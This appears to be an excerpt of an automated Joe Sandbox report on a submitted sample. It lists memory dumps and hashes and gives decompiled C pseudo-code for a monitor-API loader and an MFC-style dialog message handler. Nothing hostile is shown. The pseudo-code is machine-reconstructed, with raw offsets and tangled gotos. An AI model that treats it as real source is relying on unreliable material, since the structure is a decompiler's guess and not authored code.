Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$,dD$AfxOldWndProc423$ime
API String ID: 1191297049-714433792
Opcode ID: e9e9e0e71ff52e961d457ae236bb709206b0a3f776dbbf9ceb3bb5f2ba91c0c6
Instruction ID: 84e3f26e1d5758fcd2ef64f535b58e951b2309da213ef0e04ba7174f59460a39
Opcode Fuzzy Hash: e9e9e0e71ff52e961d457ae236bb709206b0a3f776dbbf9ceb3bb5f2ba91c0c6
Instruction Fuzzy Hash: 44619071900219ABDB209B61DD49BEB7BB8EF44325F100576F905B32D1C7389A81CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 00407777, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00407777() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x44629c; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x4462a0 = E0040771F(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x446280 = 0;
						 *0x446284 = 0;
						 *0x446288 = 0;
						 *0x44628c = 0;
						 *0x446290 = 0;
						 *0x446294 = 0;
						 *0x446298 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x446280 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x446284 = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x446288 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x44628c = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x446294 = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x446290 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x446298 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x44629c = 1;
					return _t5;
				} else {
					_t24 =  *0x446290; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

0x0040777a
0x00407780
0x0040778f
0x0040779b
0x004077a6
0x004077a8
0x004077aa
0x0040783e
0x0040783e
0x00407844
0x0040784a
0x00407850
0x00407856
0x0040785c
0x00407862
0x00407868
0x004077b0
0x004077bc
0x004077be
0x004077c0
0x004077c5
0x00000000
0x004077c7
0x004077cd
0x004077cf
0x004077d1
0x004077d6
0x00000000
0x004077d8
0x004077de
0x004077e0
0x004077e2
0x004077e7
0x00000000
0x004077e9
0x004077ef
0x004077f1
0x004077f3
0x004077f8
0x00000000
0x004077fa
0x00407800
0x00407802
0x00407804
0x00407809
0x00000000
0x0040780b
0x00407811
0x00407813
0x00407815
0x0040781a
0x00000000
0x0040781c
0x00407822
0x00407824
0x00407826
0x0040782b
0x00000000
0x0040782d
0x0040782f
0x0040782f
0x0040782f
0x0040782b
0x0040781a
0x00407809
0x004077f8
0x004077e7
0x004077d6
0x004077c5
0x00407832
0x0040783d
0x00407782
0x00407784
0x0040778e
0x0040778e

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,770D5D80,004078C3,?,?,?,?,?,?,?,00409759,00000000,00000002,00000028), ref: 004077A0
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 004077BC
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 004077CD
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004077DE
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 004077EF
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00407800
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00407811
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 00407822

Strings

MonitorFromWindow, xrefs: 004077C7
USER32, xrefs: 00407796
GetMonitorInfoA, xrefs: 0040780B
EnumDisplayMonitors, xrefs: 004077FA
MonitorFromPoint, xrefs: 004077E9
GetSystemMetrics, xrefs: 004077B6
MonitorFromRect, xrefs: 004077D8
EnumDisplayDevicesA, xrefs: 0040781C

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: 304039f2eb906d1ae472532b4b0e425858feec055aff9d1457e8f6a911d7cdbb
Instruction ID: 460c29bc39fe871b276e37692eac700ddae52ba8710db786ada5c1a6ecd8e9b2
Opcode Fuzzy Hash: 304039f2eb906d1ae472532b4b0e425858feec055aff9d1457e8f6a911d7cdbb
Instruction Fuzzy Hash: E52181B5E05A05BBC7017F29ACC542ABBE4B28B74036655BFE008E22A0D7BC6045DF5F

Uniqueness

Uniqueness Score: -1.00%

Function 0041947F, Relevance: 26.0, APIs: 17, Instructions: 452
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0041947F(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				int _t156;
				signed int _t161;
				signed int _t165;
				void* _t167;
				signed char _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t182;
				intOrPtr _t183;
				signed int _t184;
				short _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t200;
				signed int _t201;
				short _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t211;
				signed int _t215;
				signed int _t216;
				struct HWND__* _t217;
				struct tagMSG* _t221;
				intOrPtr _t224;
				void* _t231;
				void* _t234;
				struct tagMSG* _t240;
				signed int _t242;
				int _t243;
				signed int _t244;
				long _t247;
				intOrPtr _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t260;
				void* _t262;

				_t232 = __ecx;
				_t260 = _t262;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t139 = E004192DC(_a4, _a8);
				_t238 = _t139;
				if(_t139 == 0) {
					_t232 = _a4;
					_t231 = E004085E2(_a4);
					if(_t231 != 0) {
						_t221 =  *((intOrPtr*)(_t231 + 0x44));
						_a8 = _t221;
						if(_t221 != 0) {
							while(1) {
								_t9 = _t231 + 0x40; // 0x40
								_t232 = _t9;
								_t258 =  *(E00406B97( &_a8));
								_t224 =  *((intOrPtr*)(_t258 + 4));
								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
									break;
								}
								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
									if(_a8 != 0) {
										continue;
									} else {
									}
								} else {
									break;
								}
								goto L10;
							}
							_t238 = _t258;
						}
					}
				}
				L10:
				_t247 = 0;
				while(1) {
					_t238 = E0041932E(_t232, _a4, _t238, _a12);
					if(_t238 == 0) {
						break;
					}
					_t142 = E00418DD9(_t238);
					_pop(_t232);
					if(_t142 == 0) {
						L14:
						if(_t238 == 0) {
							L21:
							__eflags =  *(_t238 + 4);
							if(__eflags == 0) {
								E004037E3(0, _t232, _t238, _t247, __eflags);
								asm("int3");
								_push(0x28);
								E0041F71D(E004333FF, 0, _t238, _t247);
								_t146 = _a4;
								__eflags = _t146;
								if(_t146 != 0) {
									_v48 =  *((intOrPtr*)(_t146 + 0x20));
								} else {
									_v48 = _v48 & _t146;
								}
								_t240 = _a8;
								_t249 = _t240->message;
								_v32 = _t249;
								_v52 = GetFocus();
								_t149 = E00409C97(0, _t232, _t260, _t148);
								_t229 = 0x100;
								__eflags = _t249 - 0x100;
								_v24 = _t149;
								if(_t249 < 0x100) {
									L34:
									__eflags = _t249 + 0xfffffe00 - 9;
									if(_t249 + 0xfffffe00 > 9) {
										goto L56;
									} else {
										goto L35;
									}
								} else {
									__eflags = _t249 - 0x109;
									if(_t249 <= 0x109) {
										L35:
										__eflags = _t149;
										if(_t149 == 0) {
											L56:
											_t251 = 0;
											_v28 = 0;
											_t150 = E00409C97(_t229, _t232, _t260,  *_t240);
											_v44 = _v44 & 0;
											_v36 = _t150;
											_t152 = _v32 - _t229;
											__eflags = _t152;
											_v40 = 2;
											if(_t152 == 0) {
												_t153 = E00418D8C(_v36, _t240);
												_t232 =  *(_t240 + 8) & 0x0000ffff;
												__eflags = _t232 - 0x1b;
												if(__eflags > 0) {
													__eflags = _t232 - 0x25;
													if(_t232 < 0x25) {
														goto L75;
													} else {
														__eflags = _t232 - 0x26;
														if(_t232 <= 0x26) {
															_v44 = 1;
															goto L110;
														} else {
															__eflags = _t232 - 0x28;
															if(_t232 <= 0x28) {
																L110:
																_t171 = E00418D8C(_v24, _t240);
																__eflags = _t171 & 0x00000001;
																if((_t171 & 0x00000001) != 0) {
																	goto L75;
																} else {
																	__eflags = _v44;
																	_t232 = _a4;
																	_push(0);
																	if(_v44 == 0) {
																		_t172 = E0040D2C7(_t229, _t232, _t240);
																	} else {
																		_t172 = E0040D279(_t229, _t232, _t240);
																	}
																	_t254 = _t172;
																	__eflags = _t254;
																	if(_t254 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t254 + 8);
																		if( *(_t254 + 8) != 0) {
																			_t232 = _a4;
																			E0040CE23(_a4, _t254);
																		}
																		__eflags =  *(_t254 + 4);
																		if( *(_t254 + 4) == 0) {
																			_t173 =  *_t254;
																			__eflags = _t173;
																			if(_t173 == 0) {
																				_t232 = _a4;
																				_t174 = E00418E4A(_a4, _v24, _v44);
																			} else {
																				_t174 = E00409C97(_t229, _t232, _t260, _t173);
																			}
																			_t242 = _t174;
																			__eflags = _t242;
																			if(_t242 == 0) {
																				goto L75;
																			} else {
																				_t229 = 0;
																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
																				E00418E84(_t242);
																				__eflags =  *(_t254 + 8);
																				if( *(_t254 + 8) != 0) {
																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
																				}
																				goto L125;
																			}
																		} else {
																			_t232 =  *(_t254 + 4);
																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
																			goto L125;
																		}
																	}
																}
															} else {
																__eflags = _t232 - 0x2b;
																if(_t232 != 0x2b) {
																	goto L75;
																} else {
																	goto L97;
																}
															}
														}
													}
													goto L126;
												} else {
													if(__eflags == 0) {
														L103:
														_t243 = 0;
														__eflags = 0;
														goto L104;
													} else {
														__eflags = _t232 - 3;
														if(_t232 == 3) {
															goto L103;
														} else {
															__eflags = _t232 - 9;
															if(_t232 == 9) {
																__eflags = _t153 & 0x00000002;
																if((_t153 & 0x00000002) != 0) {
																	goto L75;
																} else {
																	_t188 = GetKeyState(0x10);
																	_t255 = _a4;
																	__eflags = _t188;
																	_t229 = 0 | _t188 < 0x00000000;
																	_t232 = _t255;
																	_t189 = E0040CCE0(_t255, 0, _t188 < 0);
																	__eflags = _t189;
																	if(_t189 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t189 + 4);
																		if( *(_t189 + 4) == 0) {
																			_t190 =  *_t189;
																			__eflags = _t190;
																			if(_t190 == 0) {
																				_t232 = _t255;
																				_t191 = E00405D69(_t255, _v36, _t229);
																			} else {
																				_t191 = E00409C97(_t229, _t232, _t260, _t190);
																			}
																			_t244 = _t191;
																			__eflags = _t244;
																			if(_t244 != 0) {
																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
																				E00418E84(_t244);
																				E0041904E(_t229, _t232, _t260, _v24, _t244);
																				_pop(_t232);
																			}
																		} else {
																			_t195 =  *(_t189 + 4);
																			_t232 = _t195;
																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
																		}
																		goto L125;
																	}
																}
																goto L126;
															} else {
																__eflags = _t232 - 0xd;
																if(_t232 == 0xd) {
																	L97:
																	__eflags = _t153 & 0x00000004;
																	if((_t153 & 0x00000004) != 0) {
																		goto L75;
																	} else {
																		_t182 = E00418E29(_v24);
																		__eflags = _t182 & 0x00000010;
																		_pop(_t232);
																		if((_t182 & 0x00000010) == 0) {
																			_t183 = E004191CF(_a4);
																		} else {
																			_t251 = _v24;
																			_t232 = _t251;
																			_t183 = E0040C9F6(_t251);
																		}
																		_t243 = 0;
																		__eflags = _t251;
																		_v40 = _t183;
																		if(_t251 != 0) {
																			L105:
																			_t232 = _t251;
																			_t184 = E0040CA70(_t251);
																			__eflags = _t184;
																			if(_t184 != 0) {
																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
																					goto L75;
																				} else {
																					_push(_t243);
																					_push(_t243);
																					_push(_t243);
																					_push(1);
																					_push(0xfffffdd9);
																					_push(_t251);
																					_v8 = _t243;
																					E0040CACD();
																					_v8 = _v8 | 0xffffffff;
																					goto L125;
																				}
																			} else {
																				MessageBeep(_t243);
																				goto L75;
																			}
																		} else {
																			L104:
																			_t251 = E004190C9(_a4, _v40);
																			__eflags = _t251 - _t243;
																			if(_t251 == _t243) {
																				goto L75;
																			} else {
																				goto L105;
																			}
																		}
																	}
																	goto L126;
																} else {
																	goto L75;
																}
															}
														}
													}
												}
												goto L79;
											} else {
												_t198 = _t152;
												__eflags = _t198;
												if(_t198 == 0) {
													L62:
													_t199 = E00418D8C(_v36, _t240);
													__eflags = _v32 - 0x102;
													if(_v32 != 0x102) {
														L64:
														_t232 =  *(_t240 + 8) & 0x0000ffff;
														__eflags = _t232 - 9;
														if(_t232 != 9) {
															L66:
															__eflags = _t232 - 0x20;
															if(__eflags == 0) {
																goto L54;
															} else {
																_push(_t240);
																_t200 = E0041947F(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
																__eflags = _t200;
																if(_t200 == 0) {
																	goto L75;
																} else {
																	_t201 =  *(_t200 + 4);
																	__eflags = _t201;
																	if(_t201 == 0) {
																		goto L75;
																	} else {
																		_t232 = _t201;
																		E004133E2(_t201, _t240);
																		L125:
																		_v28 = 1;
																	}
																}
																goto L79;
															}
														} else {
															__eflags = _t199 & 0x00000002;
															if((_t199 & 0x00000002) != 0) {
																goto L75;
															} else {
																goto L66;
															}
														}
													} else {
														__eflags = _t199 & 0x00000084;
														if((_t199 & 0x00000084) != 0) {
															goto L75;
														} else {
															goto L64;
														}
													}
												} else {
													__eflags = _t198 != 4;
													if(_t198 != 4) {
														L75:
														_t154 = _a4;
														__eflags =  *(_t154 + 0x3c) & 0x00001000;
														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
															__eflags = _t165;
															_v28 = _t165;
															if(_t165 != 0) {
																_t167 = E00409C97(_t229, _t232, _t260, GetFocus());
																__eflags = _t167 - _v24;
																if(_t167 != _v24) {
																	E00418FE1(_t232, E00409C97(_t229, _t232, _t260, GetFocus()));
																	_pop(_t232);
																}
															}
														}
														L79:
														_t155 = IsWindow(_v52);
														__eflags = _t155;
														if(_t155 != 0) {
															E0041904E(_t229, _t232, _t260, _v24, E00409C97(_t229, _t232, _t260, GetFocus()));
															_pop(_t234);
															_t161 = IsWindow(_v48);
															__eflags = _t161;
															if(_t161 != 0) {
																E004191FC(_a4, _v24, E00409C97(_t229, _t234, _t260, GetFocus()));
															}
														}
														_t156 = _v28;
													} else {
														__eflags = _v24;
														if(_v24 != 0) {
															L61:
															__eflags =  *(_t240 + 8) - 0x20;
															if( *(_t240 + 8) == 0x20) {
																goto L75;
															} else {
																goto L62;
															}
														} else {
															_t204 = GetKeyState(0x12);
															__eflags = _t204;
															if(_t204 >= 0) {
																goto L75;
															} else {
																goto L61;
															}
														}
													}
												}
											}
										} else {
											_t256 = _t149;
											while(1) {
												__eflags =  *(_t256 + 0x50);
												if( *(_t256 + 0x50) != 0) {
													break;
												}
												_t211 = E00409C97(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
												__eflags = _t211 - _a4;
												if(_t211 != _a4) {
													_t256 = E00409C97(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
													__eflags = _t256;
													if(_t256 != 0) {
														continue;
													}
												}
												break;
											}
											__eflags = _t256;
											if(_t256 == 0) {
												L45:
												__eflags = _v32 - 0x101;
												if(_v32 == 0x101) {
													L48:
													__eflags = _t256;
													if(_t256 == 0) {
														goto L55;
													} else {
														_t257 =  *(_t256 + 0x50);
														__eflags = _t257;
														if(_t257 == 0) {
															goto L55;
														} else {
															_t206 = _a8->wParam & 0x0000ffff;
															__eflags = _t206 - 0xd;
															if(_t206 != 0xd) {
																L52:
																__eflags = _t206 - 0x1b;
																if(_t206 != 0x1b) {
																	goto L55;
																} else {
																	__eflags =  *(_t257 + 0x84) & 0x00000002;
																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
																		goto L55;
																	} else {
																		goto L54;
																	}
																}
															} else {
																__eflags =  *(_t257 + 0x84) & 0x00000001;
																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
																	L54:
																	_t156 = 0;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _v32 - _t229;
													if(_v32 == _t229) {
														goto L48;
													} else {
														__eflags = _v32 - 0x102;
														if(_v32 != 0x102) {
															L55:
															_t240 = _a8;
															goto L56;
														} else {
															goto L48;
														}
													}
												}
											} else {
												_t207 =  *(_t256 + 0x50);
												__eflags = _t207;
												if(_t207 == 0) {
													goto L45;
												} else {
													__eflags =  *(_t207 + 0x58);
													if( *(_t207 + 0x58) == 0) {
														goto L45;
													} else {
														_t208 =  *(_t207 + 0x58);
														_t232 =  *_t208;
														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
														__eflags = _t209;
														if(_t209 != 0) {
															goto L45;
														} else {
															_t156 = _t209 + 1;
														}
													}
												}
											}
										}
									} else {
										goto L34;
									}
								}
								return E0041F7C2(_t156);
							} else {
								_t232 =  *(_t238 + 4);
								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
								__eflags = _t215 & 0x08000000;
								if((_t215 & 0x08000000) == 0) {
									goto L20;
								} else {
									goto L23;
								}
							}
						} else {
							_t216 =  *(_t238 + 4);
							if(_t216 == 0) {
								_t217 =  *_t238;
							} else {
								_t217 =  *(_t216 + 0x24);
							}
							if(_t217 == 0) {
								goto L21;
							} else {
								if(IsWindowEnabled(_t217) == 0) {
									L23:
									__eflags = _t238 - _v8;
									if(_t238 == _v8) {
										break;
									} else {
										__eflags = _v8;
										if(_v8 == 0) {
											_v8 = _t238;
										}
										_t247 = _t247 + 1;
										__eflags = _t247 - 0x200;
										if(_t247 < 0x200) {
											continue;
										} else {
											break;
										}
									}
								} else {
									L20:
									_t141 = _t238;
									L28:
									return _t141;
								}
							}
						}
					} else {
						_t232 = _a4;
						_t238 = E0040CCE0(_a4, _t238, 0);
						if(_t238 == 0) {
							break;
						} else {
							goto L14;
						}
					}
					L126:
				}
				_t141 = 0;
				__eflags = 0;
				goto L28;
			}

0x0041947f
0x00419480
0x00419482
0x00419483
0x00419487
0x00419488
0x00419489
0x00419490
0x00419495
0x00419499
0x0041949b
0x004194a3
0x004194a7
0x004194a9
0x004194ae
0x004194b1
0x004194b3
0x004194b7
0x004194b7
0x004194bf
0x004194c1
0x004194c6
0x00000000
0x00000000
0x004194d0
0x004194e0
0x00000000
0x00000000
0x004194e2
0x00000000
0x00000000
0x00000000
0x00000000
0x004194d0
0x004194e4
0x004194e4
0x004194b1
0x004194a7
0x004194e6
0x004194e6
0x004194e8
0x004194f4
0x004194fa
0x00000000
0x00000000
0x004194fd
0x00419504
0x00419505
0x00419517
0x00419519
0x0041953c
0x0041953c
0x0041953f
0x0041956f
0x00419574
0x00419575
0x0041957c
0x00419581
0x00419584
0x00419586
0x00419590
0x00419588
0x00419588
0x00419588
0x00419593
0x00419596
0x00419599
0x004195a3
0x004195a6
0x004195ab
0x004195b0
0x004195b2
0x004195b5
0x004195bf
0x004195c5
0x004195c8
0x00000000
0x00000000
0x00000000
0x00000000
0x004195b7
0x004195b7
0x004195bd
0x004195ce
0x004195ce
0x004195d0
0x0041967d
0x0041967f
0x00419681
0x00419684
0x00419689
0x0041968c
0x00419692
0x00419692
0x00419694
0x0041969b
0x00419725
0x0041972a
0x0041972e
0x00419731
0x0041986e
0x00419871
0x00000000
0x00419877
0x00419877
0x0041987a
0x0041992a
0x00000000
0x00419880
0x00419880
0x00419883
0x00419931
0x00419935
0x0041993a
0x0041993c
0x00000000
0x00419942
0x00419942
0x00419946
0x00419949
0x0041994b
0x00419954
0x0041994d
0x0041994d
0x0041994d
0x00419959
0x0041995b
0x0041995d
0x00000000
0x00419963
0x00419963
0x00419967
0x00419969
0x0041996d
0x0041996d
0x00419972
0x00419976
0x00419986
0x00419988
0x0041998a
0x00419997
0x0041999d
0x0041998c
0x0041998d
0x0041998d
0x004199a2
0x004199a4
0x004199a6
0x00000000
0x004199ac
0x004199b2
0x004199b5
0x004199b8
0x004199bd
0x004199c0
0x004199cd
0x004199cd
0x00000000
0x004199c0
0x00419978
0x00419978
0x0041997e
0x00000000
0x0041997e
0x00419976
0x0041995d
0x00419889
0x00419889
0x0041988c
0x00000000
0x00000000
0x00000000
0x00000000
0x0041988c
0x00419883
0x0041987a
0x00000000
0x00419737
0x00419737
0x004198c6
0x004198c6
0x004198c6
0x00000000
0x0041973d
0x0041973d
0x00419740
0x00000000
0x00419746
0x00419746
0x00419749
0x004197e8
0x004197ea
0x00000000
0x004197f0
0x004197f2
0x004197f8
0x004197fd
0x00419800
0x00419803
0x00419808
0x0041980d
0x0041980f
0x00000000
0x00419815
0x00419815
0x00419819
0x0041982e
0x00419830
0x00419832
0x00419840
0x00419842
0x00419834
0x00419835
0x00419835
0x00419847
0x00419849
0x0041984b
0x00419854
0x00419859
0x00419862
0x00419868
0x00419868
0x0041981b
0x0041981b
0x00419821
0x00419823
0x00419823
0x00000000
0x00419819
0x0041980f
0x00000000
0x0041974f
0x0041974f
0x00419752
0x00419892
0x00419892
0x00419894
0x00000000
0x0041989a
0x0041989d
0x004198a2
0x004198a4
0x004198a5
0x004198b6
0x004198a7
0x004198a7
0x004198aa
0x004198ac
0x004198ac
0x004198bb
0x004198bd
0x004198bf
0x004198c2
0x004198dd
0x004198dd
0x004198df
0x004198e4
0x004198e6
0x004198f4
0x004198f7
0x00000000
0x004198fd
0x004198fd
0x004198fe
0x004198ff
0x00419900
0x00419902
0x00419907
0x00419908
0x0041990b
0x00419913
0x00000000
0x00419913
0x004198e8
0x004198e9
0x00000000
0x004198e9
0x004198c4
0x004198c8
0x004198d3
0x004198d5
0x004198d7
0x00000000
0x00000000
0x00000000
0x00000000
0x004198d7
0x004198c2
0x00000000
0x00000000
0x00000000
0x00000000
0x00419752
0x00419749
0x00419740
0x00419737
0x00000000
0x004196a1
0x004196a2
0x004196a2
0x004196a3
0x004196cf
0x004196d3
0x004196d8
0x004196df
0x004196e5
0x004196e5
0x004196e9
0x004196ed
0x004196f3
0x004196f3
0x004196f7
0x00000000
0x004196fd
0x004196fd
0x00419704
0x00419709
0x0041970b
0x00000000
0x0041970d
0x0041970d
0x00419710
0x00419712
0x00000000
0x00419714
0x00419715
0x00419717
0x004199d3
0x004199d3
0x004199d3
0x00419712
0x00000000
0x0041970b
0x004196ef
0x004196ef
0x004196f1
0x00000000
0x00000000
0x00000000
0x00000000
0x004196f1
0x004196e1
0x004196e1
0x004196e3
0x00000000
0x00000000
0x00000000
0x00000000
0x004196e3
0x004196a5
0x004196a5
0x004196a8
0x00419758
0x00419758
0x0041975b
0x00419761
0x00419769
0x0041976f
0x00419771
0x00419774
0x0041977f
0x00419784
0x00419787
0x00419792
0x00419797
0x00419797
0x00419787
0x00419774
0x00419798
0x004197a1
0x004197a3
0x004197a5
0x004197b9
0x004197bf
0x004197c3
0x004197c5
0x004197c7
0x004197d8
0x004197d8
0x004197c7
0x004197dd
0x004196ae
0x004196ae
0x004196b1
0x004196c4
0x004196c4
0x004196c9
0x00000000
0x00000000
0x00000000
0x00000000
0x004196b3
0x004196b5
0x004196bb
0x004196be
0x00000000
0x00000000
0x00000000
0x00000000
0x004196be
0x004196b1
0x004196a8
0x004196a3
0x004195d6
0x004195dc
0x004195de
0x004195de
0x004195e2
0x00000000
0x00000000
0x004195ea
0x004195ef
0x004195f2
0x004195ff
0x00419601
0x00419603
0x00000000
0x00000000
0x00419603
0x00000000
0x004195f2
0x00419605
0x00419607
0x0041962c
0x0041962c
0x00419633
0x00419643
0x00419643
0x00419645
0x00000000
0x00419647
0x00419647
0x0041964a
0x0041964c
0x00000000
0x0041964e
0x00419651
0x00419655
0x00419659
0x00419664
0x00419664
0x00419668
0x00000000
0x0041966a
0x0041966a
0x00419671
0x00000000
0x00000000
0x00000000
0x00000000
0x00419671
0x0041965b
0x0041965b
0x00419662
0x00419673
0x00419673
0x00000000
0x00000000
0x00000000
0x00419662
0x00419659
0x0041964c
0x00419635
0x00419635
0x00419638
0x00000000
0x0041963a
0x0041963a
0x00419641
0x0041967a
0x0041967a
0x00000000
0x00000000
0x00000000
0x00000000
0x00419641
0x00419638
0x00419609
0x00419609
0x0041960c
0x0041960e
0x00000000
0x00419610
0x00419610
0x00419614
0x00000000
0x00419616
0x00419616
0x0041961c
0x0041961f
0x00419622
0x00419624
0x00000000
0x00419626
0x00419626
0x00419626
0x00419624
0x00419614
0x0041960e
0x00419607
0x00000000
0x00000000
0x00000000
0x004195bd
0x004197e5
0x00419541
0x00419541
0x00419546
0x00419549
0x0041954e
0x00000000
0x00000000
0x00000000
0x00000000
0x0041954e
0x0041951b
0x0041951b
0x00419520
0x00419527
0x00419522
0x00419522
0x00419522
0x0041952b
0x00000000
0x0041952d
0x00419536
0x00419550
0x00419550
0x00419553
0x00000000
0x00419555
0x00419555
0x00419558
0x0041955a
0x0041955a
0x0041955d
0x0041955e
0x00419564
0x00000000
0x00000000
0x00000000
0x00000000
0x00419564
0x00419538
0x00419538
0x00419538
0x00419568
0x0041956c
0x0041956c
0x00419536
0x0041952b
0x00419507
0x00419507
0x00419511
0x00419515
0x00000000
0x00000000
0x00000000
0x00000000
0x00419515
0x00000000
0x00419505
0x00419566
0x00419566
0x00000000

APIs

GetFocus.USER32 ref: 004194D2
IsWindowEnabled.USER32(?), ref: 0041952E
__EH_prolog3_catch.LIBCMT ref: 0041957C
GetFocus.USER32 ref: 0041959C
GetParent.USER32(?), ref: 004195E7
GetParent.USER32(?), ref: 004195F7
GetKeyState.USER32(00000012), ref: 004196B5
IsDialogMessageA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00419769
GetFocus.USER32 ref: 0041977C
GetFocus.USER32 ref: 00419789
IsWindow.USER32(?), ref: 004197A1
GetFocus.USER32 ref: 004197AD
IsWindow.USER32(?), ref: 004197C3
GetFocus.USER32 ref: 004197C9
GetKeyState.USER32(00000010), ref: 004197F2
MessageBeep.USER32(00000000), ref: 004198E9

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
